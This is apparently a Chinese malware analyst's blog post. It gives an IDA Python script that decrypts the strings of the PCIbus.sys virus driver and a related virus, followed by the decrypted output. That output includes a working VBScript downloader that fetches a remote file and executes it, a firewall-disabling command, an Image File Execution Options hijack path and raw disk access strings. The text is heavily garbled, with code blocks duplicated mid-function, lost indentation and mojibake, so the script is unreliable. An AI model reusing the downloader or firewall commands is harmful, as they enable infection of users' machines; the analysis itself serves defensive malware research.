去年大概10月多的时候,有一个病毒非常流行,其中会释放一个sys文件,名字是PCIbus.sys,这个驱动文件里面的重要信息都是加密的,由于各种原因没有调试,而且那时候颇有时间,就写了这个病毒的解密脚本,当时还是下了点功夫的.这几天分析一种流行病毒的时候,发现病毒体内又用了加密的方法,在跟踪其解密函数的时候隐隐的感觉到似曾相识.就联想起了PCIbus.sys,就翻出了当时的解密脚本,发现是相同的解密方法.
这样有实力的团体,孜孜不倦的书写着病毒,不知道它们出了多少病毒,也无法预测它们还要出多少害人的猛兽,而在现行的法律下面我们唯一能做的就是把它们的罪恶形迹给暴露出来,该团体的病毒酷爱这种解密方法,那么就让这个算法在阳光下暴晒吧.纪录下解密脚本,省得以后又找不到.
"""
PCIBUS.py
This Script is only use for decode strings,than be encrypt like this:
PCIBUS_Decode(pdecodebuff,pEnCryptCode,len(pEnCryptCode),pTable_copy,0xF,1)
"""
def InitBuffer():
for index in range(0,0×50):
pikeFor40Table.append(0)
ExchenageFor40Table.append(0)
Trangle.append(0)
Trangle2.append(0)
pUnknown.append(0)
loc_tempd.append(0)
loc_tempc.append(0)
for i in range(0,0×50):
pexecryCode.append(0)
def SpecialPrint(buffer,line):
for index in range(0,len(buffer)-1,line):
print buffer[index:index+line]
for index in range(0,0×50):
pikeFor40Table.append(0)
ExchenageFor40Table.append(0)
Trangle.append(0)
Trangle2.append(0)
pUnknown.append(0)
loc_tempd.append(0)
loc_tempc.append(0)
for i in range(0,0×50):
pexecryCode.append(0)
def SpecialPrint(buffer,line):
for index in range(0,len(buffer)-1,line):
print buffer[index:index+line]
def PrintHex(buffer,line):
buffer_loc = [ ]
for index in range(0,len(buffer)):
buffer_loc.append(buffer[index])
for index in range(0,len(buffer_loc)):
buffer_loc[index] = hex(buffer_loc[index])
SpecialPrint(buffer_loc[0:8],line)
buffer_loc = [ ]
for index in range(0,len(buffer)):
buffer_loc.append(buffer[index])
for index in range(0,len(buffer_loc)):
buffer_loc[index] = hex(buffer_loc[index])
SpecialPrint(buffer_loc[0:8],line)
def ReadData(Pos,lenth,buffer,filehandle,isprint):
zero=[ ]
filehandle.seek(Pos,0)
table = filehandle.read(lenth)
for index in range(0,len(table)):
zero.append(ord(table[index]))
for index in range(0,len(table)):
buffer.append(zero[index])
if(isprint!=0):
SpecialPrint(buffer,16)
def InitGlobleData():
”’
”’
decrypt arguments from Decode function inside
pos_4Key = 0x5D48
pos_6Key = 0x5D80
pos_num2 = 0x5DB0
instans =0x7008;
pos_table = 0x5C78
pos_table2 = 0x5CB8
pos_goden = 0x5D28
pos_goden1 = 0x5CF8
pos_inside_table = 0x5DC0
pos_crypt = 0x5A78
”’
pos_4Key = 0x7398
pos_6Key = 0x73D0
pos_num2 = 0x7400
pos_table = 0x72C8
pos_table2 = 0x7308
pos_goden = 0x7378
pos_goden1 = 0x7348
pos_inside_table = 0x7410
pos_crypt = 0x620C
instans =0xE508
InitBuffer()
virus_file=’input file path’
hfile = file(virus_file,’rb’)
ReadData(instans,0x10,pTable_copy,hfile,0)
ReadData(pos_4Key,0x38,Key4Table,hfile,0)
ReadData(pos_num2,0x10,NumberTable2,hfile,0)
ReadData(pos_6Key,0x30,Key6Table,hfile,0)
ReadData(pos_table,0x40,Table,hfile,0)
ReadData(pos_table2,0x40,Table2,hfile,0)
ReadData(pos_goden,0x40,Goden,hfile,0)
ReadData(pos_inside_table,0x210,inside_table,hfile,0)
ReadData(pos_crypt,0x1C,pCryptCode,hfile,0)
ReadData(pos_goden1,0x40,GodenTable,hfile,0)
pos_4Key = 0x5D48
pos_6Key = 0x5D80
pos_num2 = 0x5DB0
instans =0x7008;
pos_table = 0x5C78
pos_table2 = 0x5CB8
pos_goden = 0x5D28
pos_goden1 = 0x5CF8
pos_inside_table = 0x5DC0
pos_crypt = 0x5A78
”’
pos_4Key = 0x7398
pos_6Key = 0x73D0
pos_num2 = 0x7400
pos_table = 0x72C8
pos_table2 = 0x7308
pos_goden = 0x7378
pos_goden1 = 0x7348
pos_inside_table = 0x7410
pos_crypt = 0x620C
instans =0xE508
InitBuffer()
virus_file=’input file path’
hfile = file(virus_file,’rb’)
ReadData(instans,0x10,pTable_copy,hfile,0)
ReadData(pos_4Key,0x38,Key4Table,hfile,0)
ReadData(pos_num2,0x10,NumberTable2,hfile,0)
ReadData(pos_6Key,0x30,Key6Table,hfile,0)
ReadData(pos_table,0x40,Table,hfile,0)
ReadData(pos_table2,0x40,Table2,hfile,0)
ReadData(pos_goden,0x40,Goden,hfile,0)
ReadData(pos_inside_table,0x210,inside_table,hfile,0)
ReadData(pos_crypt,0x1C,pCryptCode,hfile,0)
ReadData(pos_goden1,0x40,GodenTable,hfile,0)
hfile.close()
#,pikeFor40Table,Key4Table,Key6Table,ExchenageFor40Table,NumberTable2
def extendTable(Mem_ex,pTable_ex):
# extrend:
encode_buff = [ ]
for index in range(0,0×40):
dwSpan = index/8
bUion = pTable_ex[dwSpan]
temp = index & 7
bUion = bUion >> temp
bUion = bUion & 1
pikeFor40Table[index]=bUion
for index in range(0,0×38):
temp = Key4Table[index]
bUion = pikeFor40Table[temp-1]
ExchenageFor40Table[index] = bUion
for index in range(0,0×38):
pikeFor40Table[index] = ExchenageFor40Table[index]
for index in range(0,0×10):
dwseed = NumberTable2[index]
dwspan = 0x1c – dwseed
for i_copy in range(0,dwseed):
ExchenageFor40Table[i_copy] = pikeFor40Table[i_copy]
for i_copy in range(0,dwspan):
pikeFor40Table[i_copy] = pikeFor40Table[i_copy+dwseed]
for i_copy in range(0,dwseed):
pikeFor40Table[dwspan+i_copy] = ExchenageFor40Table[i_copy]
for i_copy in range(0,dwseed):
ExchenageFor40Table[i_copy] = pikeFor40Table[0x1c+i_copy]
for i_copy in range(0,dwspan):
pikeFor40Table[0x1c+i_copy] = pikeFor40Table[0x1c+i_copy+dwseed]
for i_copy in range(0,dwseed):
pikeFor40Table[0x1C+dwspan+i_copy] = ExchenageFor40Table[i_copy]
for inside_index in range(0,0×30):
temp6 = Key6Table[inside_index]
bUion = pikeFor40Table[temp6-1]
ExchenageFor40Table[inside_index] = bUion
for i_copy in range(0,0×30):
Mem_ex.append(ExchenageFor40Table[i_copy])
return Mem_ex
def Tableoption(pTable,key):
if(key>0x10):
bkey = 0x10
bkey = key
def extendTable(Mem_ex,pTable_ex):
# extrend:
encode_buff = [ ]
for index in range(0,0×40):
dwSpan = index/8
bUion = pTable_ex[dwSpan]
temp = index & 7
bUion = bUion >> temp
bUion = bUion & 1
pikeFor40Table[index]=bUion
for index in range(0,0×38):
temp = Key4Table[index]
bUion = pikeFor40Table[temp-1]
ExchenageFor40Table[index] = bUion
for index in range(0,0×38):
pikeFor40Table[index] = ExchenageFor40Table[index]
for index in range(0,0×10):
dwseed = NumberTable2[index]
dwspan = 0x1c – dwseed
for i_copy in range(0,dwseed):
ExchenageFor40Table[i_copy] = pikeFor40Table[i_copy]
for i_copy in range(0,dwspan):
pikeFor40Table[i_copy] = pikeFor40Table[i_copy+dwseed]
for i_copy in range(0,dwseed):
pikeFor40Table[dwspan+i_copy] = ExchenageFor40Table[i_copy]
for i_copy in range(0,dwseed):
ExchenageFor40Table[i_copy] = pikeFor40Table[0x1c+i_copy]
for i_copy in range(0,dwspan):
pikeFor40Table[0x1c+i_copy] = pikeFor40Table[0x1c+i_copy+dwseed]
for i_copy in range(0,dwseed):
pikeFor40Table[0x1C+dwspan+i_copy] = ExchenageFor40Table[i_copy]
for inside_index in range(0,0×30):
temp6 = Key6Table[inside_index]
bUion = pikeFor40Table[temp6-1]
ExchenageFor40Table[inside_index] = bUion
for i_copy in range(0,0×30):
Mem_ex.append(ExchenageFor40Table[i_copy])
return Mem_ex
def Tableoption(pTable,key):
if(key>0x10):
bkey = 0x10
bkey = key
extendTable(oriMem,pTable)
for index in range(0,8):
TableCopy8.append(pTable[index+8])
if bkey>8:
extendTable(oriMem2,TableCopy8)
def Base_Decode(pBuffer,decode,Mem_ex,loc_Number):
tail = [ ]
for index in range(0,0×30):
tail.append(Mem_ex[0x2D0+index])
for index in range(0,0×40):
dwSpan = index/8
bUion = decode[dwSpan]
temp = index & 7
bUion = bUion >> temp
bUion = bUion & 1
Trangle[index] = (bUion)
dwSpan = index/8
bUion = decode[dwSpan]
temp = index & 7
bUion = bUion >> temp
bUion = bUion & 1
Trangle[index] = (bUion)
for index in range(0,0×40):
temp = Table[index]
bUion = Trangle[temp-1]
ExchenageFor40Table[index] = bUion
temp = Table[index]
bUion = Trangle[temp-1]
ExchenageFor40Table[index] = bUion
for index in range(0,0×40):
Trangle[index] = ExchenageFor40Table[index]
if loc_Number !=0:
for Glob_index in range(0,0×10):
dist = 0x2D0 – Glob_index*0x30
for index in range(0,0×30):
tail[index] = Mem_ex[dist+index]
for index in range(0,0×20):
pUnknown[index] = Trangle[index]
Trangle[index] = ExchenageFor40Table[index]
if loc_Number !=0:
for Glob_index in range(0,0×10):
dist = 0x2D0 – Glob_index*0x30
for index in range(0,0×30):
tail[index] = Mem_ex[dist+index]
for index in range(0,0×20):
pUnknown[index] = Trangle[index]
Goden_decode(Trangle,tail)
for index_in in range(0,0×20):
dl = Trangle[0x20+index_in]
al = Trangle[index_in]
Trangle[index_in] = al^dl
for index_in in range(0,0×20):
Trangle[0x20+index_in] = pUnknown[index_in]
for index_in in range(0,0×20):
dl = Trangle[0x20+index_in]
al = Trangle[index_in]
Trangle[index_in] = al^dl
for index_in in range(0,0×20):
Trangle[0x20+index_in] = pUnknown[index_in]
for index in range(0,0×40):
temp = Table2[index]
bUion = Trangle[temp-1]
ExchenageFor40Table[index] = bUion
for index in range(0,0×40):
Trangle[index]=ExchenageFor40Table[index]
for index in range(0,8):
pBuffer[index] = 0
for index in range(0,0×40):
b_code = Trangle[index]
ecx = index & 7
b_code = b_code << ecx
i = index/8
pBuffer[i] = pBuffer[i] | b_code
if loc_Number ==0:
for index in range(0,0×20):
Trangle2[index] = Trangle[index+0x20]
for Glob_index in range(0,0×10):
dist = Glob_index*0x30
for index in range(0,0×30):
tail[index] = Mem_ex[dist+index]
for index in range(0,0×20):
pUnknown[index] = Trangle2[index]
Goden_decode(Trangle2,tail)
for index_in in range(0,0×20):
dl = Trangle[index_in]
al = Trangle2[index_in]
Trangle2[index_in] = al^dl
for index_in in range(0,0×20):
Trangle[index_in] = pUnknown[index_in]
for index in range(0,0×20):
Trangle[index+0x20] = Trangle2[index]
for index in range(0,0×40):
temp = Table2[index]
bUion = Trangle[temp-1]
ExchenageFor40Table[index] = bUion
for index in range(0,0×40):
Trangle[index]=ExchenageFor40Table[index]
for index in range(0,8):
pBuffer[index] = 0
for index in range(0,0×40):
b_code = Trangle[index]
ecx = index & 7
b_code = b_code << ecx
i = index/8
pBuffer[i] = pBuffer[i] | b_code
def Goden_decode(pTragal,orimems):
pTragal_copy = [ ]
mem = [ ]
for index in range(0,0×50):
pTragal_copy.append(0)
mem.append(0)
temp = Table2[index]
bUion = Trangle[temp-1]
ExchenageFor40Table[index] = bUion
for index in range(0,0×40):
Trangle[index]=ExchenageFor40Table[index]
for index in range(0,8):
pBuffer[index] = 0
for index in range(0,0×40):
b_code = Trangle[index]
ecx = index & 7
b_code = b_code << ecx
i = index/8
pBuffer[i] = pBuffer[i] | b_code
if loc_Number ==0:
for index in range(0,0×20):
Trangle2[index] = Trangle[index+0x20]
for Glob_index in range(0,0×10):
dist = Glob_index*0x30
for index in range(0,0×30):
tail[index] = Mem_ex[dist+index]
for index in range(0,0×20):
pUnknown[index] = Trangle2[index]
Goden_decode(Trangle2,tail)
for index_in in range(0,0×20):
dl = Trangle[index_in]
al = Trangle2[index_in]
Trangle2[index_in] = al^dl
for index_in in range(0,0×20):
Trangle[index_in] = pUnknown[index_in]
for index in range(0,0×20):
Trangle[index+0x20] = Trangle2[index]
for index in range(0,0×40):
temp = Table2[index]
bUion = Trangle[temp-1]
ExchenageFor40Table[index] = bUion
for index in range(0,0×40):
Trangle[index]=ExchenageFor40Table[index]
for index in range(0,8):
pBuffer[index] = 0
for index in range(0,0×40):
b_code = Trangle[index]
ecx = index & 7
b_code = b_code << ecx
i = index/8
pBuffer[i] = pBuffer[i] | b_code
def Goden_decode(pTragal,orimems):
pTragal_copy = [ ]
mem = [ ]
for index in range(0,0×50):
pTragal_copy.append(0)
mem.append(0)
for index in range(0,0×30):
seed = GodenTable[index]
spear = pTragal[seed-1]
ExchenageFor40Table[index] = spear
for index in range(0,0×30):
mem[index] = ExchenageFor40Table[index]
seed = GodenTable[index]
spear = pTragal[seed-1]
ExchenageFor40Table[index] = spear
for index in range(0,0×30):
mem[index] = ExchenageFor40Table[index]
for index in range(0,0×30,2):
cl = orimems[index]
dl = mem[index]
dl = dl ^ cl
mem[index] = dl
cl = mem[index+1]
dl = orimems[index+1]
cl = cl ^ dl
mem[index+1] = cl
crypts(pTragal,mem)
for index in range(0,0×20):
seed = Goden[index]
spear = pTragal[seed-1]
ExchenageFor40Table[index] = spear
for index in range(0,0×20):
pTragal[index] = ExchenageFor40Table[index]
cl = orimems[index]
dl = mem[index]
dl = dl ^ cl
mem[index] = dl
cl = mem[index+1]
dl = orimems[index+1]
cl = cl ^ dl
mem[index+1] = cl
crypts(pTragal,mem)
for index in range(0,0×20):
seed = Goden[index]
spear = pTragal[seed-1]
ExchenageFor40Table[index] = spear
for index in range(0,0×20):
pTragal[index] = ExchenageFor40Table[index]
def crypts(pTragals,mems):
i_mems = 0
i_tra = 0
for index in range(0,0×8):
d_code = ((((mems[0+i_mems]*2)+mems[5+i_mems]+i_tra)) * 0x10)
a_code = ((mems[3+i_mems]+ (mems[1+i_mems]*2 + mems[2+i_mems])*2)*2+mems[4+i_mems])
intem = d_code + a_code
#print hex(dwtempl + dwtemps)
dwtemps = inside_table[intem]
pTragals[0+i_tra] = dwtemps & 1
pTragals[1+i_tra] = (dwtemps/2) & 1
pTragals[2+i_tra] = (dwtemps/4) & 1
pTragals[3+i_tra] = (dwtemps/8) & 1
i_mems = i_mems + 6
i_tra = i_tra + 4
i_mems = 0
i_tra = 0
for index in range(0,0×8):
d_code = ((((mems[0+i_mems]*2)+mems[5+i_mems]+i_tra)) * 0x10)
a_code = ((mems[3+i_mems]+ (mems[1+i_mems]*2 + mems[2+i_mems])*2)*2+mems[4+i_mems])
intem = d_code + a_code
#print hex(dwtempl + dwtemps)
dwtemps = inside_table[intem]
pTragals[0+i_tra] = dwtemps & 1
pTragals[1+i_tra] = (dwtemps/2) & 1
pTragals[2+i_tra] = (dwtemps/4) & 1
pTragals[3+i_tra] = (dwtemps/8) & 1
i_mems = i_mems + 6
i_tra = i_tra + 4
def PCIBUS_Decode(pexecryCode,pCryptCode,dwLenthOfCrypte,pTable,key,Number):
strr = ""
str_mys = [ ]
Tableoption(pTable,key)
size = dwLenthOfCrypte/8
if size == 0:
return 0
for index in range(0,size):
for index_de in range(0,8):
loc_tempd[index_de] = pCryptCode[index_de+index*8]
Base_Decode(loc_tempc,loc_tempd,oriMem,Number)
Base_Decode(loc_tempc,loc_tempc,oriMem2,oriMem2[0])
Base_Decode(loc_tempc,loc_tempc,oriMem,Number)
for index_de in range(0,8):
pexecryCode[index_de+index*8] = loc_tempc[index_de]
strr = ""
str_mys = [ ]
Tableoption(pTable,key)
size = dwLenthOfCrypte/8
if size == 0:
return 0
for index in range(0,size):
for index_de in range(0,8):
loc_tempd[index_de] = pCryptCode[index_de+index*8]
Base_Decode(loc_tempc,loc_tempd,oriMem,Number)
Base_Decode(loc_tempc,loc_tempc,oriMem2,oriMem2[0])
Base_Decode(loc_tempc,loc_tempc,oriMem,Number)
for index_de in range(0,8):
pexecryCode[index_de+index*8] = loc_tempc[index_de]
def FindPrePush(ea,num):
cou_ea = ea
push_num = num
mnem_pre = GetMnem(cou_ea)
index_find = 0
while index_find < push_num:
cou_ea = PrevHead(cou_ea,0)
mnem_pre = GetMnem(cou_ea)
if ‘push’ in mnem_pre:
index_find = index_find+1
continue
return cou_ea
cou_ea = ea
push_num = num
mnem_pre = GetMnem(cou_ea)
index_find = 0
while index_find < push_num:
cou_ea = PrevHead(cou_ea,0)
mnem_pre = GetMnem(cou_ea)
if ‘push’ in mnem_pre:
index_find = index_find+1
continue
return cou_ea
def LoadDataA(byte_ea):
name = [ ]
while Byte(byte_ea) != 0:
name.append(Byte(byte_ea))
byte_ea = byte_ea + 1
return name
name = [ ]
while Byte(byte_ea) != 0:
name.append(Byte(byte_ea))
byte_ea = byte_ea + 1
return name
def FindAllDeCodeArg():
address = [ ]
seg_ea = Segments()
EndEA = SegEnd(seg_ea[0])
decode_xref = [ ]
decode_rv = LocByName("Decode")
first_xref = RfirstB0(decode_rv)
decode_xref.append(first_xref)
next_xref = first_xref
while next_xref !=BADADDR:
next_xref = RnextB0(decode_rv,next_xref)
decode_xref.append(next_xref)
for xref in decode_xref:
if xref != BADADDR:
sec_ea = FindPrePush(xref,2)
string_ea = GetOperandValue(sec_ea,0)
address.append(string_ea)
return address
address = [ ]
seg_ea = Segments()
EndEA = SegEnd(seg_ea[0])
decode_xref = [ ]
decode_rv = LocByName("Decode")
first_xref = RfirstB0(decode_rv)
decode_xref.append(first_xref)
next_xref = first_xref
while next_xref !=BADADDR:
next_xref = RnextB0(decode_rv,next_xref)
decode_xref.append(next_xref)
for xref in decode_xref:
if xref != BADADDR:
sec_ea = FindPrePush(xref,2)
string_ea = GetOperandValue(sec_ea,0)
address.append(string_ea)
return address
if __name__ == "__main__":
file_out = r"e:\unpack\log.txt"
ho = file(file_out,’w’)
InitGlobleData()
codes = FindAllDeCodeArg()
for ea_add in codes:
final = ""
str_my = [ ]
i = 0
if ea_add != 0:
pCryptCode = LoadDataA(ea_add)
PCIBUS_Decode(pexecryCode,pCryptCode,len(pCryptCode),pTable_copy,0xF,1)
for index in range(0,len(pexecryCode)):
str_my.append(pexecryCode[index])
i = i+1
if(pexecryCode[index] == 0):
if(pexecryCode[index+1] == 0):
break
for index in range(0,len(str_my)):
final = final + "".join(chr(str_my[index]))
print final
ho.write(final)
ho.close()
file_out = r"e:\unpack\log.txt"
ho = file(file_out,’w’)
InitGlobleData()
codes = FindAllDeCodeArg()
for ea_add in codes:
final = ""
str_my = [ ]
i = 0
if ea_add != 0:
pCryptCode = LoadDataA(ea_add)
PCIBUS_Decode(pexecryCode,pCryptCode,len(pCryptCode),pTable_copy,0xF,1)
for index in range(0,len(pexecryCode)):
str_my.append(pexecryCode[index])
i = i+1
if(pexecryCode[index] == 0):
if(pexecryCode[index+1] == 0):
break
for index in range(0,len(str_my)):
final = final + "".join(chr(str_my[index]))
print final
ho.write(final)
ho.close()
运行结果:
update.
explorer.exe
\\.\obj
~wxp2ins.
Atixeve2.
kernel32.
CreateProcessA
urlmon.dll
URLDownloadToFileA
URLDownloadToFileA
wsnotifyo.cfg
wsnotifyw.cfg
\nctfub1.tmp
<script language=javascript src=
></script>
On Error Resume Next
explorer.exe
\\.\obj
~wxp2ins.
Atixeve2.
kernel32.
CreateProcessA
urlmon.dll
URLDownloadToFileA
URLDownloadToFileA
wsnotifyo.cfg
wsnotifyw.cfg
\nctfub1.tmp
<script language=javascript src=
></script>
On Error Resume Next
Dim t, r, l, ads
t = "Microsoft.XML" + tian6 + "HTTP"
l = LCase("conlme.exe")
r = LCase(WScript.Arguments(0))
Set x = CreateObject(t)
x.Open "GET", r, 0
x.Send()
adults.vbs
wscript.exe
ads = "ADO"+"DB.Stream"
wscript.exe
ads = "ADO"+"DB.Stream"
Set g = CreateObject(ads)
g.Mode = 3
g.Type = 1
g.Open()
g.Write(x.responseBody)
g.SaveToFile l, 2
Set ob = CreateObject("Shell.Application")
ob.ShellExecute l
ads = "ADO"+"DB.Stream"
Set g = CreateObject(ads)
g.Mode = 3
g.Type = 1
g.Open()
g.Write(x.responseBody)
g.SaveToFile l, 2
Set ob = CreateObject("Shell.Application")
ob.ShellExecute l
ads = "ADO"+"DB.Stream"
Set g = CreateObject(ads)
g.Mode = 3
g.Type = 1
g.Open()
g.Write(x.responseBody)
g.SaveToFile l, 2
Set ob = CreateObject("Shell.Application")
ob.ShellExecute l
ads = "ADO"+"DB.Stream"
Set g = CreateObject(ads)
g.Mode = 3
g.Type = 1
g.Open()
g.Write(x.responseBody)
g.SaveToFile l, 2
Set ob = CreateObject("Shell.Application")
ob.ShellExecute l
ads = "ADO"+"DB.Stream"
Set g = CreateObject(ads)
g.Mode = 3
g.Type = 1
g.Open()
g.Write(x.responseBody)
g.SaveToFile l, 2
Set ob = CreateObject("Shell.Application")
ob.ShellExecute l
ÈðÐÇÌáʾDO"+"DB.Stream"
Set g = CreateObject(ads)
g.Mode = 3
g.Type = 1
g.Open()
g.Write(x.responseBody)
g.SaveToFile l, 2
Set ob = CreateObject("Shell.Application")
ob.ShellExecute l
ÈðÐÇÌáʾDO"+"DB.Stream"
Set g = CreateObject(ads)
g.Mode = 3
g.Type = 1
g.Open()
g.Write(x.responseBody)
g.SaveToFile l, 2
Set ob = CreateObject("Shell.Application")
ob.ShellExecute l
wpcap.dll
tpnc.batl
net stop sharedaccess
svchost.exe
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
Notifyw
update.
avp.exe
www.3271.cc
explorer.exe
\\.\PhysicalDrive0
\\.\PhysicalHarDisk0
~wxp2ins.
Atixeve2.
\\.\AtiObject1
tpnc.batl
net stop sharedaccess
svchost.exe
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
Notifyw
update.
avp.exe
www.3271.cc
explorer.exe
\\.\PhysicalDrive0
\\.\PhysicalHarDisk0
~wxp2ins.
Atixeve2.
\\.\AtiObject1
天空 
估计这类病毒的算法马上就会被修改了。